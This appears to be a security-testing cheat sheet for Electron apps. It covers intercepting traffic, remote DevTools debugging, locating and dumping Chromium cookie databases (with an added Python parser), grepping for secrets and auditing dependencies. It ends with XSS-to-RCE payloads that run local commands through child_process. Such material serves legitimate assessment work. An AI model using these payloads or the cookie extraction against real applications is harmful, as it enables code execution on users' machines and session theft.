Electron / Atom Shell

Electron (formerly known as Atom Shell) is a software framework developed and maintained by GitHub for building desktop applications using JavaScript, HTML, and CSS. By embedding Chromium (browser engine) and Node.js (backend) into its binary, Electron lets developers maintain a single JavaScript codebase and ship cross-platform apps that run on Windows, macOS, and Linux without native development. It also exposes APIs for native integration with Node services and an inter-process communication (IPC) module.

Intercept HTTP requests

You need to add Burp’s certificate to the Windows Trust Store or to Mac OS’ Keychain. See Burp Suite.

Start Burp Suite to intercept requests.

Windows – Start the application using a proxy

ElectronApp.exe --proxy-server=127.0.0.1:8080

Mac OS – Start the application using a proxy

cd ElectronApp.app/Contents/MacOS
./ElectronApp --proxy-server=127.0.0.1:8080

Debugging with Chrome’s DevTools

ElectronApp.exe --remote-debugging-port=54321

  • Start Chrome and go to chrome://inspect
  • Under Devices, click Discover network targets -> Configure
  • Add localhost:54321 (no need to select Enable port forwarding) and click Done
  • Under Remote Targets, the application should appear
  • Click on Inspect

Find Electron version

In DevTools, open the Console tab and run one of the following to read the Electron version. Then check which security advisories apply to that version.

navigator.userAgent
navigator.userAgent.match(/Electron\/([\d\.]+\d+)/)[1]

Cookies

Since Electron applications use Chromium, cookies are stored in:

Windows

C:\Users\<username>\AppData\Roaming\<app name>\Network\Cookies

Mac OS

/Users/<username>/Library/Application Support/<app name>/Cookies

Show cookies

This is a SQLite file. Transfer the file to Kali and extract the cookies.

sqlite3 Cookies "select name || ' = ' || value from cookies"
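As an added example (not part of the original cheat sheet), the Python script below reads the same Cookies SQLite file using Chromium's column names, converts expires_utc from its 1601-based microsecond epoch, and flags cookies missing the Secure or HttpOnly attribute. It builds a constructed in-memory copy of the table so it runs offline; the trimmed column set and the sample rows are assumptions. On Windows and macOS the value column is usually empty and the ciphertext sits in encrypted_value, which the script reports rather than printing a blank.

```python
import sqlite3
from datetime import datetime, timedelta, timezone

# Chromium stores cookie timestamps as microseconds since 1601-01-01 UTC
# (the Windows FILETIME epoch), not as Unix seconds.
WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def webkit_to_datetime(micros):
    """Convert an expires_utc value to an aware datetime; 0 means a session cookie."""
    return WEBKIT_EPOCH + timedelta(microseconds=micros) if micros else None

def dump_cookies(conn):
    """Return one dict per cookie with decoded expiry and weak-attribute findings."""
    rows = conn.execute(
        "SELECT host_key, name, value, encrypted_value, path, expires_utc, "
        "is_secure, is_httponly FROM cookies ORDER BY host_key, name")
    out = []
    for host, name, value, enc, path, exp, secure, httponly in rows:
        # On Windows and macOS Chromium normally leaves `value` empty and keeps the
        # DPAPI/Keychain ciphertext in `encrypted_value`; flag that instead of a blank.
        encrypted = value == "" and bool(enc)
        findings = []
        if not secure:
            findings.append("missing Secure flag")
        if not httponly:
            findings.append("missing HttpOnly flag")
        out.append({
            "host": host, "name": name, "path": path,
            "value": None if encrypted else value, "encrypted": encrypted,
            "expires": webkit_to_datetime(exp),
            "secure": bool(secure), "httponly": bool(httponly),
            "findings": findings})
    return out

def build_sample_db():
    """Constructed in-memory stand-in for a Cookies file (only the columns used above)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE cookies (host_key TEXT, name TEXT, value TEXT, encrypted_value BLOB, "
        "path TEXT, expires_utc INTEGER, is_secure INTEGER, is_httponly INTEGER)")
    conn.executemany("INSERT INTO cookies VALUES (?,?,?,?,?,?,?,?)", [
        ("app.example.test", "session", "abc123", b"", "/", 13350000000000000, 1, 1),
        ("app.example.test", "token", "", b"v10\x01\x02\x03", "/", 0, 0, 0)])
    return conn

if __name__ == "__main__":
    # Use sqlite3.connect("Cookies") instead of build_sample_db() on a copied real file.
    for cookie in dump_cookies(build_sample_db()):
        print(cookie)
```

Run it against a copied Cookies file by passing sqlite3.connect("Cookies") to dump_cookies; the sample database only exists so the script works offline.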

Show stack trace for warnings

ElectronApp.exe --trace-warnings

Sensitive Information

Look for hardcoded passwords or keys

grep -Ri "pass" ./
grep -Ri "key" ./

Known vulnerabilities

Identify known vulnerabilities in the project’s dependencies

npm i --package-lock-only
npm audit

XSS

XSS to RCE

These payloads only work when the renderer has Node integration enabled, so that require is reachable from page JavaScript; with nodeIntegration disabled and contextIsolation enabled, the same XSS cannot reach child_process.

Windows payloads

<img src=x onerror="alert(require('child_process').execSync('calc').toString());">
<img src=x onerror=alert(require('child_process').exec('calc')); />

Linux & Mac OS payloads

<img src=x onerror="alert(require('child_process').execSync('gnome-calculator').toString());">
<img src=x onerror="alert(require('child_process').execSync('id').toString());">
<img src=x onerror="alert(require('child_process').execSync('ls -l').toString());">
<img src=x onerror="alert(require('child_process').execSync('uname -a').toString());">